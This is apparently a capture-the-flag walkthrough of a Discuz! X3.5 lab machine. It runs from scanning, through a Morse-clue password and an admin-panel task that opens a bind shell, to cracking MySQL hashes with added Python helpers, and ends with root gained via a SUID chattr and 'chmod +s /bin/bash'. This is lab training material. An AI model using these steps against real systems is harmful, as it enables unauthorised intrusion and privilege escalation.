Chat2

Target description

  • QQ group: 660930334
  • Writeup reference: https://7r1umphk.github.io/post/nei-bu-_Chat2.html

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:13 CST
Nmap scan report for 192.168.2.1
Host is up (0.0014s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:10:EF:B6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.69
Host is up (0.0016s latency).
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds

Target IP: 192.168.2.69

2. Port scanning

2.1 Full TCP port scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:13 CST
Nmap scan report for 192.168.2.69
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 47.83 seconds

Open TCP ports: 22, 80

2.2 Service and version detection

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:14 CST
Nmap scan report for 192.168.2.69
Host is up (0.00085s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-generator: Discuz! X3.5
| http-robots.txt: 20 disallowed entries (15 shown)
| /api/ /data/ /source/ /install/ /template/default/
| /config/ /uc_client/ /uc_server/ /admin.php /search.php
| /member.php /api.php /misc.php /connect.php
|_/forum.php?mod=redirect*
|_http-title: \xE8\xAE\xBA\xE5\x9D\x9B - Powered by Discuz!
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

  1. Port 22: SSH, OpenSSH 8.4p1 (Debian 11 package).
  2. Port 80: HTTP, Apache httpd 2.4.62; robots.txt is present and the generator header identifies the site as Discuz! X3.5.

2.3 UDP port scan

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:15 CST
Nmap scan report for 192.168.2.69
Host is up (0.0017s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 101.13 seconds

No usable UDP services: 68/udp shows only as open|filtered, and it is the DHCP client port, so there is nothing to attack here.

2.4 Vulnerability script scan

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80 192.168.2.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:18 CST
Nmap scan report for 192.168.2.69
Host is up (0.0011s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.69
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.2.69:80/
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/search.php?mod=forum&srchtxt=%E6%B4%BB%E5%8A%A8&formhash=a8c08364&searchsubmit=true&source=hotsearch
| Form id: searchlogo
| Form action: search.php?mod=forum
|
| Path: http://192.168.2.69:80/forum.php
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/forum.php
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?showmobile=yes
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?showmobile=yes
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/search.php?searchsubmit=yes
| Form id: searchlogo
| Form action: search.php?mod=forum
|
| Path: http://192.168.2.69:80/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/search.php?mod=forum&srchtxt=discuz&formhash=a8c08364&searchsubmit=true&source=hotsearch
| Form id: searchlogo
| Form action: search.php?mod=forum
|
| Path: http://192.168.2.69:80/forum.php?mod=redirect&tid=1&goto=lastpost
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=redirect&tid=1&goto=lastpost
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/home.php?mod=space&username=admin
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/home.php?mod=space&username=admin
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=misc&action=showdarkroom
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=misc&action=showdarkroom
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/home.php?mod=space&do=friend&view=online&type=member
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/home.php?mod=space&do=friend&view=online&type=member
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/home.php?mod=space&username=admin
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/home.php?mod=space&username=admin
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
| Form id: lsform
| Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
| Form id: scbar_form
| Form action: search.php?searchsubmit=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
| Form id: moderate
| Form action: forum.php?mod=topicadmin&action=moderate&fid=2&infloat=yes&nopost=yes
|
| Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
| Form id: fastpostform
|_ Form action: forum.php?mod=post&action=newthread&fid=2&topicsubmit=yes&infloat=yes&handlekey=fastnewpost
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-cross-domain-policy:
| VULNERABLE:
| Cross-domain and Client Access policies.
| State: VULNERABLE
| A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader,
| etc. use to access data across different domains. A client acces policy file is similar to cross-domain policy
| but is used for M$ Silverlight applications. Overly permissive configurations enables Cross-site Request
| Forgery attacks, and may allow third parties to access sensitive data meant for the user.
| Check results:
| /crossdomain.xml:
|
|
|
|
|
| Extra information:
| Trusted domains:*
|
| References:
| http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html
| http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html
| https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html
| http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file
| https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29
|_ https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin.php: Possible admin folder
| /robots.txt: Robots file
|_ /crossdomain.xml: Adobe Flash crossdomain policy
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 58.26 seconds

New paths found: /admin.php, /crossdomain.xml and /robots.txt. The http-csrf hits are the login and search forms; Discuz protects state-changing requests with its formhash token, so those are mostly noise. The crossdomain.xml that trusts * is a genuine misconfiguration, but it only affects Flash/Silverlight clients and is not the way in here.

3. Web directory brute force

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 12443]
/search.php (Status: 200) [Size: 4988]
/home.php (Status: 200) [Size: 9316]
/forum.php (Status: 200) [Size: 12443]
/data (Status: 301) [Size: 311] [--> http://192.168.2.69/data/]
/misc.php (Status: 200) [Size: 33]
/static (Status: 301) [Size: 313] [--> http://192.168.2.69/static/]
/admin.php (Status: 200) [Size: 2608]
/member.php (Status: 200) [Size: 8954]
/portal.php (Status: 200) [Size: 9039]
/template (Status: 301) [Size: 315] [--> http://192.168.2.69/template/]
/source (Status: 301) [Size: 313] [--> http://192.168.2.69/source/]
/group.php (Status: 200) [Size: 9123]
/install (Status: 301) [Size: 314] [--> http://192.168.2.69/install/]
/api (Status: 301) [Size: 310] [--> http://192.168.2.69/api/]
/api.php (Status: 200) [Size: 13]
/config (Status: 301) [Size: 313] [--> http://192.168.2.69/config/]
/connect.php (Status: 200) [Size: 8944]
/robots.txt (Status: 200) [Size: 639]
/plugin.php (Status: 200) [Size: 8950]
/archiver (Status: 301) [Size: 315] [--> http://192.168.2.69/archiver/]
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1345151 / 1764488 (76.23%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1345530 / 1764488 (76.26%)
===============================================================
Finished
===============================================================

II. Exploitation

1. Web information disclosure

Port 80 serves a Discuz! X3.5 forum.

The online-members widget lists an account named admin, and the default board has one thread, Let's Encrypt, whose body is a string of Morse code:

.--. .- ... ... .-- --- .-. -.. .---- ..--- ...--

Decoding the Morse gives PASSWORD123.
Note: Morse has no letter case, so for login or brute-force attempts every case combination has to be considered (password123, Password123, PASSWORD123, and so on); the one that works here is password123.
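As an added example (not part of the original writeup), the Python below decodes the Morse string from the thread and writes out every case variant of the result, which is the wordlist a login brute force needs when the source has no case. The Morse table, the output file name and the treatment of unknown symbols are my own choices.

```python
"""Decode the Morse found in the forum thread and build the case-variant
wordlist the note above calls for. Added example, not from the original post."""
from itertools import product
from typing import List

# International Morse, letters and digits only (enough for the thread).
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# The string copied from the Let's Encrypt thread on the target.
THREAD_MORSE = ".--. .- ... ... .-- --- .-. -.. .---- ..--- ...--"


def morse_decode(s: str) -> str:
    """Decode space-separated Morse. ' / ' or three spaces separate words.
    Unknown symbols become '?' instead of being silently dropped."""
    words = []
    for word in s.strip().replace(" / ", "   ").split("   "):
        words.append("".join(MORSE.get(sym, "?") for sym in word.split()))
    return " ".join(words)


def case_variants(word: str) -> List[str]:
    """Every upper/lower combination of the letters in word; digits and
    punctuation stay as they are. Eight letters give 2**8 = 256 candidates."""
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    # dict.fromkeys keeps insertion order and drops duplicates.
    return list(dict.fromkeys("".join(p) for p in product(*choices)))


if __name__ == "__main__":
    plain = morse_decode(THREAD_MORSE)
    variants = case_variants(plain)
    print(plain, len(variants), "variants")
    # One candidate per line, ready for hydra/ffuf (file name is my choice).
    with open("password_case_variants.txt", "w") as fh:
        fh.write("\n".join(variants) + "\n")
```

Feed password_case_variants.txt to the login brute forcer as the password list with admin as the single user; at 256 entries it is small enough that lockout is the only thing to watch.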

2. Accessing the web admin back end

The credentials admin:password123 log us into the forum.
From the user menu, open the Admin Center entry and enter the password a second time to reach the admin back end.

3. Obtaining a www-data shell

The forum is Discuz! X3.5 and a search for public exploits against this version turned up nothing usable.
Browsing the admin center, under Tools > Scheduled Tasks there is a custom task named shell.php.

The task cannot be edited (its content is not modifiable from the UI), so we run it directly.
After it executes, rescan the ports with nmap:

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 16:06 CST
Nmap scan report for chat.dsz (192.168.2.69)
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
12345/tcp open netbus
MAC Address: 08:00:27:E6:8D:F4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 25.54 seconds

A new port, 12345/tcp, is open. The netbus label comes from nmap's port-number table, not from fingerprinting; it is whatever shell.php bound to that port.

Connect to it directly with nc:

┌──(root㉿kali)-[~]
└─# nc 192.168.2.69 12345
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have a bind shell running as www-data.

Upgrading to a stable shell

script /dev/null -c bash
# press Ctrl+Z to suspend the shell
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

III. Privilege escalation

1. Obtaining the discuz user

1.1 Database configuration

Under the web root /var/www/html, the database credentials sit in config/config_global.php:

www-data@Chat2:/var/www/html/config$ cat config_global.php 
...
// ---------------------------- CONFIG DB ----------------------------- //
$_config['db'][1]['dbhost'] = '127.0.0.1';
$_config['db'][1]['dbuser'] = 'discuz_user';
$_config['db'][1]['dbpw'] = 'StrongPassword!123';
$_config['db'][1]['dbcharset'] = 'utf8mb4';
$_config['db'][1]['pconnect'] = 0;
$_config['db'][1]['dbname'] = 'discuz_db';
$_config['db'][1]['tablepre'] = 'maze_';
$_config['db']['slave'] = '';
$_config['db']['common']['slave_except_table'] = '';
$_config['db']['common']['engine'] = 'innodb';
...

This exposes the database user discuz_user and its password StrongPassword!123.

1.2 Using the database

Log in to MariaDB with these credentials. The discuz_user account can see the mysql system database, which is more than the application needs:

www-data@Chat2:/var/www/html/config$ mysql -u discuz_user -p'StrongPassword!123'
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 104
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| discuz_db |
| information_schema |
| mysql |
+--------------------+
3 rows in set (0.001 sec)

The mysql.user table holds the account password hashes:

MariaDB [mysql]> select user,password from user;
+-------------+-------------------------------------------+
| User | Password |
+-------------+-------------------------------------------+
| mariadb.sys | |
| root | invalid |
| mysql | invalid |
| discuz_user | *CF0058A6F9B624591DDA643E26A401BEBAD3DFD8 |
| hackme | *FAAFFE644E901CFAFAEC7562415E5FAEC243B8B2 |
+-------------+-------------------------------------------+
5 rows in set (0.001 sec)

The hashes starting with * are mysql_native_password, i.e. SHA1(SHA1(password)) in hex, not MD5; they are unsalted, so online lookup tables (commonly mislabelled as "MD5 decryption") work on them. The invalid entries for root and mysql are MariaDB accounts that authenticate through unix_socket rather than a password.
CF0058A6F9B624591DDA643E26A401BEBAD3DFD8 has no hit.
FAAFFE644E901CFAFAEC7562415E5FAEC243B8B2 resolves to root123.
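Added example, not from the original post: because the mysql.user hashes are unsalted double-SHA1, a local check needs no online service. The code computes the mysql_native_password hash and runs a small constructed candidate list against the two hashes dumped above; the candidate list is my assumption.

```python
"""mysql_native_password hashing and a wordlist check against the
mysql.user dump. Added example for this writeup, not code from the post.
Format: '*' + upper-case hex of SHA1(SHA1(password)); no salt."""
import hashlib
from typing import Iterable, Optional

# Hashes exactly as they appear in the mysql.user dump on the target.
TARGET_HASHES = {
    "discuz_user": "*CF0058A6F9B624591DDA643E26A401BEBAD3DFD8",
    "hackme": "*FAAFFE644E901CFAFAEC7562415E5FAEC243B8B2",
}

# Constructed candidate list (assumption): obvious guesses plus the
# passwords already seen on this box.
WORDLIST = ["password", "123456", "root", "root123", "password123",
            "StrongPassword!123", "discuz", "hackme"]


def mysql_native_hash(password: str) -> str:
    """'*' + hex(SHA1(SHA1(pw))). The inner digest is fed to the outer SHA1
    as raw bytes, not as hex text; hashing the hex is the usual mistake."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def crack(target: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate whose hash equals target, else None.
    Non-hash values such as 'invalid' (unix_socket accounts) or '' are
    rejected up front rather than compared."""
    if not target.startswith("*") or len(target) != 41:
        return None
    target = target.upper()
    for pw in candidates:
        if mysql_native_hash(pw) == target:
            return pw
    return None


if __name__ == "__main__":
    for user, h in TARGET_HASHES.items():
        print(f"{user:12s} {h}  ->  {crack(h, WORDLIST)}")
```

The same function is what a defender would use to confirm that no mysql_native_password account still carries a dictionary password after migrating the rest to unix_socket or ed25519 authentication.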

1.3 Obtaining the discuz user

root123 belongs to the MySQL account hackme, but passwords get reused: try it for the local user discuz with su.

www-data@Chat2:/var/www/html$ su discuz
Password:
discuz@Chat2:/var/www/html$ id
uid=1000(discuz) gid=1000(discuz) groups=1000(discuz)

We now have a shell as discuz.

2. Obtaining root

2.1 SUID vector and file attributes

Check what this user can run with sudo:

discuz@Chat2:/var/www/html$ sudo -l
Matching Defaults entries for discuz on Chat2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User discuz may run the following commands on Chat2:
(ALL) NOPASSWD: /home/discuz/chat

The discuz user may run /home/discuz/chat as root without a password. Because the target lives in the user's own home directory, whoever controls that path controls what runs as root.

Look for binaries with the SUID bit set:

discuz@Chat2:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chattr
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

/usr/bin/chattr has the SUID bit set, which is not a Debian default. Running with effective UID 0 it passes the CAP_LINUX_IMMUTABLE check, so any user can set or clear extended attributes such as immutable (i) on any file.

The plan is to replace /home/discuz/chat with a script of our own and run it through sudo.

  1. Renaming or deleting chat fails with Operation not permitted. As discuz we own the home directory, and rename/unlink only need write permission on the directory, not the file, so this refusal usually means the file carries a special extended attribute:

    discuz@Chat2:~$ mv chat chat.bak
    mv: cannot move 'chat' to 'chat.bak': Operation not permitted
  2. Check the attributes with lsattr:

    discuz@Chat2:~$ lsattr chat 
    ----i---------e---- chat

    lsattr prints the file's extended attributes. The i (immutable) flag locks the file: it cannot be modified, deleted, renamed or hard-linked, even by root, until the flag is cleared, and clearing it requires CAP_LINUX_IMMUTABLE, which normally only root has. That is exactly the capability the SUID chattr hands to every user.
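The escalation rests on three facts read from three command outputs: a NOPASSWD sudo rule whose target the user controls, a SUID binary outside the distro baseline (chattr), and an immutable flag on that target. As an added example (not from the original post), the Python below parses the transcript text above and reports those findings together, so the same triage can be run on any sudo -l, find and lsattr output. The sample inputs are copied from the transcript; treating the page's find listing minus chattr as the Debian 11 baseline is an assumption.

```python
"""Triage sudo -l, SUID find and lsattr output for the chattr/immutable
escalation pattern. Added example for this writeup, not code from the post."""
import re
from typing import Dict, List

# --- constructed inputs, copied from the transcript above --------------------
SUDO_L = """\
Matching Defaults entries for discuz on Chat2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User discuz may run the following commands on Chat2:
    (ALL) NOPASSWD: /home/discuz/chat
"""

SUID_FIND = """\
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chattr
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
"""

LSATTR_HOME = "----i---------e---- chat\n"

# Assumed Debian 11 default SUID set: the listing above with chattr removed.
DEBIAN_SUID_BASELINE = set(SUID_FIND.split()) - {"/usr/bin/chattr"}

# One sudoers rule line, e.g. "(ALL) NOPASSWD: /home/discuz/chat".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Return the rules listed after the 'User X may run ...' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmd").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "cmd": cmd.strip().split()[0]})
    return rules


def parse_lsattr(text: str) -> Dict[str, str]:
    """Map file name -> attribute flag string from lsattr output."""
    out = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            out[parts[1]] = parts[0]
    return out


def user_controlled(path: str, user: str) -> bool:
    """True if the user can swap the file: it sits under the user's home or a
    world-writable directory. Rename/unlink need write on the directory."""
    return path.startswith((f"/home/{user}/", "/tmp/", "/var/tmp/", "/dev/shm/"))


def unexpected_suid(find_output: str, baseline: set) -> List[str]:
    return sorted(set(find_output.split()) - baseline)


def triage(user: str, sudo_text: str, find_output: str, lsattr_text: str) -> List[str]:
    """Combine the three checks into the findings a reviewer would report."""
    findings = []
    extra = unexpected_suid(find_output, DEBIAN_SUID_BASELINE)
    findings.extend(f"SUID outside baseline: {p}" for p in extra)
    attrs = parse_lsattr(lsattr_text)
    for r in parse_sudo_l(sudo_text):
        if not (r["nopasswd"] and user_controlled(r["cmd"], user)):
            continue
        msg = f"NOPASSWD sudo as ({r['runas']}) on user-controlled {r['cmd']}"
        name = r["cmd"].rsplit("/", 1)[-1]
        if "i" in attrs.get(name, ""):  # immutable flag present
            msg += (" [immutable, clearable: chattr is SUID]"
                    if "/usr/bin/chattr" in extra else
                    " [immutable, needs CAP_LINUX_IMMUTABLE]")
        findings.append(msg)
    return findings


if __name__ == "__main__":
    for f in triage("discuz", SUDO_L, SUID_FIND, LSATTR_HOME):
        print("-", f)
```

On a real host replace the three constants with the live output of sudo -l, find / -perm -u=s -type f and lsattr ~; if chattr were not SUID the immutable rule would be reported as a dead end rather than a path to root.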

2.2 Replacing the file and escalating

Approach:

  • Use the SUID /usr/bin/chattr to clear the i attribute on /home/discuz/chat.
  • Replace /home/discuz/chat with our own script.
  • Run the modified chat through sudo so that it executes as root.
    The script sets the SUID bit on /bin/bash, after which bash -p gives a root shell at any time.
  1. Clear the i attribute with the SUID chattr:

    discuz@Chat2:~$ /usr/bin/chattr -i chat
  2. Back up the original and create the replacement script (it has no #! line and still ran here; adding #!/bin/sh is the safer habit):

    discuz@Chat2:~$ mv chat chat.bak
    discuz@Chat2:~$ echo 'chmod +s /bin/bash' > chat
    discuz@Chat2:~$ chmod +x chat
  3. Check the current permissions on /bin/bash:

    discuz@Chat2:~$ ls -la /bin/bash
    -rwxr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
  4. Run the script through sudo:

    discuz@Chat2:~$ sudo /home/discuz/chat
  5. Check /bin/bash again to confirm the SUID bit is set:

    discuz@Chat2:~$ ls -la /bin/bash
    -rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash

    The mode is now rwsr-sr-x: chmod +s sets both the setuid and the setgid bit, and the setuid bit is the one we need.

2.3 Getting root

Run bash -p. The -p (privileged) flag stops bash from resetting the effective UID to the real UID at startup, so the shell keeps euid 0:

discuz@Chat2:~$ bash -p
bash-5.0# id
uid=1000(discuz) gid=1000(discuz) euid=0(root) egid=0(root) groups=0(root),1000(discuz)

IV. Flags

bash-5.0# cat /home/discuz/user.txt /root/root.txt 
flag{user-41352be6a84e5910fdef6afec4e41617}
flag{root-099177104a7291ba00f83ab188987c5d}

Chat2
http://miao-sec.github.io/Maze-sec/Chat2/
Author: Miao
Published: 21 August 2025
License: BY-MIAO